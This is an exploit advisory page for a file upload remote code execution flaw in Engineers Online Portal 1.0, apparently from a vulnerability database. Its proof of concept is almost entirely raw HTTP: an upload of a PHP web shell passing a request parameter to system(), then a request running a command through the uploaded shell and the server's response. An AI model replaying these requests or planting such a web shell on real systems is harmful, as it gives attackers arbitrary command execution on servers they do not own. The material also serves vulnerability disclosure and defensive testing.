Engineers Online Portal 1.0 File Upload Remote Code Execution (RCE)

2021.10.29
Credit: SadKris
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) # Date: 10/23/2021 # Exploit Author: SadKris # Venor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Version: 1.0 # Tested on: XAMPP, Windows 11 # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /EngineerShit/teacher_avatar.php HTTP/1.1 Host: localhost.me Content-Length: 510 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost.me Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost.me/EngineerShit/dasboard_teacher.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="image"; filename="vuln.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="change" # Response HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:51:19 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 <script> window.location = "dasboard_teacher.php"; </script> # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1 Host: localhost.me Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:54:07 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 154 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> gottem bois


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top